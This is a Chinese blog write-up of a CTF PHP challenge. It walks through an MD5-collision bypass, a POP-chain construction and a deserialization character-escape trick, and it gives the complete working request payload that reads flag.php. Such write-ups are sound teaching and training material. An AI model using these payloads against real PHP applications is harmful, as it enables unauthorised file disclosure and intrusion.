CTF-字符逃逸例题

最新推荐文章于 2024-06-17 10:49:46 发布
最新推荐文章于 2024-06-17 10:49:46 发布
阅读量226 收藏
点赞数
文章标签: php 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62593857/article/details/128889550
版权

题目

看到require flag.php,并且有file_get_contents函数,可以通过它获取文件内容,所以关键是怎么调用file_get_contents函数得到flag.php中内容

 ===比较

因为进行了强制转换,所以只能用md5碰撞来解

用fastcoll_v1.0.0.5.exe生成两个内容不同,md5值相同的字符串

例如:

a=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2
&b=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2

php反序列化

出现unserialize函数,想到反序列化,因为出现_construct,_destruct,_toString等魔术方法,可构造pop链,User::_conostruct->Lost::_destruct->Reader::_toString,只需让$username或$password为Lost对象,Lost类中的变量b为Reader对象并让Reader类的$c=flag.php,即可调用file_get_contents函数得到flag.php内容,但是又出现了新的问题,首先我们只看

我们一般会这样写poc:

$username=new Lost();

$username->b=new Reader();

$username->b->c="flag.php";

$password="abc";#随便什么

$u=new User($username,$password);

echo serialize($u);

但是因为题中出现$u = new User($_POST['username'] ?? "admin" , $_POST['password'] ?? "admin");

我们传递的数据变成了字符串,所以以上方法行不通,那该怎么解决?

字符逃逸

我们在waf函数中可以看到str_replace('flag', '', $data),再看到unserialize(waf(serialize($u))),我们可以想到利用字符逃逸原理(http://【PHP反序列化漏洞学习】 https://www.bilibili.com/video/BV1R24y1r71C/?p=15&share_source=copy_web可以看B站的视频学习),构造出

payload

username=adminflagflagflagflagflagflagflag&password=admin";s:3:"add";O:4:"Lost":1:{s:1:"b";O:6:"Reader":1:{s:1:"c";s:8:"flag.php";}}}

但是由于flag字符串被过滤,因此我们需要用十六进制表达66\6c\61\67\2E\70\68\70(记得flag.php前面的s需要改成大写的S),再结合===比较,得到完整的payload

username=adminflagflagflagflagflagflagflag&password=admin";s:3:"add";O:4:"Lost":1:{s:1:"b";O:6:"Reader":1:{s:1:"c";S:8:"\66\6c\61\67\2E\70\68\70";}}}&a=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2
&b=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2

得到base64编码的flag

 最后解码得flag{51ca8e40b5e43ac1e8b524fd8ed5ee64}

总结

刚做题的时候没有看出来是字符逃逸,可能是类似的题做得太少,还得多练练。。。

ytxy
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CTF-misc工具2-CTF-Tools-masterV1.3.7
08-17
CTF-Tools-master是一个专注于密码编码识别与解码的工具,能自动推断密码的编码类型,并进行解码。 适用人群: 该工具主要适用于参加CTF竞赛的选手,以及对密码编码算法感兴趣的信息安全从业人员。 使用场景: 在CTF竞赛...
CTF-字符串编码识别工具,网络安全CTF比赛的好帮手!
06-10
信息安全-CTF-字符串编码识别工具,网络安全CTF比赛的好帮手!让MISC题变得更简单!
一天一道ctf 第33天(反序列化字符逃逸
scrawman的博客
07-15 258
看界面很像sql注入,但是试了几次发觉不太行。dirsearch扫一下目录,找到了www.zip文件。 profile.php里有反序列化的代码,应该可以利用: <?php require_once('class.php'); if($_SESSION['username'] == null) { die('Login First'); } $username = $_SESSION['username']; $profile=$user->show_profile($use.
CTFPHP反序列化字符逃逸漏洞
06-16 1311
作者:高玉涵 博客:blog.csdn.net/cg_i 时间:2021.6.16 22:26、。/>/ CTF入门好难 赛后,主办方给出答案后的第77天,我终于解开了这道题。 CTF作为流行在信息安全界著名竞赛,像我这种“被赶鸭子上架的程序员”——零基础。答案都看不懂,我太难了!不了解原理和背景,资料也无从找起。输了比赛不可怕,就怕输的不明不白,抱着这种不甘,也为了探究缘故,除了努力学习别无它法,期间走了不少弯路,终得解惑。这对于我来说,没有激动与喜悦,有得只是深刻。 现将解题过程分享出
php反序列化字符逃逸
2301_80913334的博客
03-30 1211
字符增多逃逸:第一个字符串增多吐出多余代码,把多余位代码构造成逃逸的成员属性,构造出一个逃逸成员属性字符减少逃逸:第一个字符串减少吃掉有效代码,在第二个字符串构造代码,多逃逸出一个成员属性做题顺序:1、找目标;2、构造所需的有效代码;3、将构造出的有效代码作为值赋值给属性。
BUUCTF__web题解合集(三)
风过江南乱的博客
07-28 992
1、[MRCTF2020]Ez_bypass 2、[GXYCTF2019]BabyUpload 3、[MRCTF2020]你传你????呢 4、[BJDCTF 2nd]假猪套天下第一 5、[极客大挑战 2019]FinalSQL
一道ctf题关于php反序列化字符逃逸
BerL1n
07-18 2361
2019强网杯 easy_sql 这题知识点堆叠注入;以前还未遇到过 这是过滤掉的内容,因此常见的注入方式我们是不能再使用了。 然后提交试试。发现似乎是直接把返回的原始数据给返回了。 3.然后来测试一下有没有注入,似乎是有的。 /?inject=1%27or+%271%27%3D%271 /?inject=1’ or ‘1’='1 4.来检查一下过滤情况,过滤函数如下。 过滤了 select,u...
ctf-2017-release:BSidesSF CTF 2017版本
05-28
ctf-2017 2017 BSidesSF CTF面临的挑战 内置的 , , , , 在本地应对挑战 您可以使用docker在本地运行所有挑战。 docker-compose build && docker-compose up -d 挑战将在http://localhost:PORT提供,基于...
CTF-Tools-v1.3.7.zip
01-29
CTF常用工具集
CTF-100题.-天天练习-学习
11-01
CTF-100题.-----------------天天练习------------------学习 100小题,试例练习
DASCTF-Esunserialize(反序列化字符逃逸)
Vicl1fe的博客
04-25 4090
环境 <?php show_source("index.php"); function write($data) { return str_replace(chr(0) . '*' . chr(0), '\0\0\0', $data); } function read($data) { return str_replace('\0\0\0', chr(0) . '*' . ...
ctfphp反序列化字符串数组逃逸(转自最详细的大佬)2021-9-9
qq_45290991的博客
09-09 617
[0CTF 2016]piapiapia WP(详细) 1.打开网站,是个登录框,尝试注入无果.....按道理来说就是注入了啊喂 2.玄学时间到:::       目录扫完啥结果没有。在buuctf做题总是这样...
反序列化字符逃逸——初体验
D.MIND 的博客
02-27 1427
前言:从CTFshow上做的一道反序列化字符逃逸的题,第一次接触,想了半天(可能是我太菜了>__<)后来才发现其实不难理解,真的需要动手写脚本操作一下,光看不好理解 题目链接 message.php: <?php highlight_file(__FILE__); include('flag.php'); class message{ public $from; public $msg; public $to; public $token='user
CTFshow新春欢乐赛--web6--反序列化字符逃逸
unexpectedthing的博客
02-09 1836
web6 考点:反序列化数组+字符逃逸 这道题还是挺有意思的,首先看代码 <?php error_reporting(0); highlight_file(__FILE__); $function = $_GET['POST']; function filter($img){ $filter_arr = array('ctfshow','daniu','happyhuyear'); $filter = '/'.implode('|',$filter_arr).'/i';
[0CTF 2016]piapiapia & php反序列化字符逃逸
为之的博客
07-10 540
一、php反序列化字符逃逸 <?php class user{ public $user = 'admin'; public $pass = 'passwd'; } $a = new user(); $b = serialize($a); echo $b."<br>"; $c = unserialize($b); echo $c->pass; ?> 运行结果: 序列化后的字符串应该能看出来,大括号外面有类名及长度,括..
深入解析PHP函数
最新发布
NatLindsay的博客
06-17 286
PHP函数是一种重要的编程概念,它可以帮助开发者组织和管理代码,提高代码的可重用性和可维护性。在PHP中,函数可以完成各种任务,从简单的数学计算到复杂的数据库查询和数据处理。本文将从多个角度探讨PHP函数的应用,涵盖了函数的定义和调用、内置函数的使用、自定义函数的创建以及常见的函数库。函数的参数:函数可以接受零个或多个参数,用于传递数据给函数内部使用。函数可以带有参数,用于接收输入,也可以返回值。函数命名:选择一个有意义的函数名,以便描述函数的功能。函数体:编写函数的具体实现代码,实现特定的功能。
1. NAS和SAN存储
u010198709的博客
06-13 495
流程:存储端共享裸块设备,客户端连接存储映射出sdx的虚拟硬盘,客户端分区格式化挂载使用。IQN名称格式: iqn.yyyy-mm.反域名:自定义名称。用户名:openfiler, 密码:password。磁盘接口:SATA,SAS、NVME。支持nfs、cifs协议共享存储空间。nfs:适用于Linux、Unix。类型:IP SAN、FC SAN。cifs:适用于Windows。磁盘类型:机械硬盘、SSD。基于文件系统级别的共享。DAS 直接附加存储。NAS 网络附加存储。SAN 存储区域网络。
PHP异常处理的最佳实践及常见问题解决
NatLindsay的博客
06-11 324
异常处理的基本原理是,当try块中的代码发生异常时,PHP会寻找匹配的catch块进行处理,如果没有找到对应的catch块,则异常会向上传递直至被处理为止。PHP异常处理是在开发过程中至关重要的一环,它能够帮助开发人员捕获和处理程序运行过程中的错误和异常情况,提高代码的稳定性和可靠性。在实际开发中,可能会遇到各种各样的异常处理问题,比如异常未被捕获、异常信息不清晰、异常处理性能问题等。合理地使用自定义异常类能够使异常处理更加灵活和规范化,有助于统一异常信息和错误码,提高代码的可维护性和可读性。
ctf-qsnctf此地无银三百
02-20
ctf-qsnctf是一个CTF(Capture The Flag)比赛平台,它提供了一系列的网络安全挑战,旨在帮助参与者提升网络安全技能和解决问题的能力。在ctf-qsnctf平台上,参与者可以通过解决各种类型的题目来获取旗帜(flag),...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值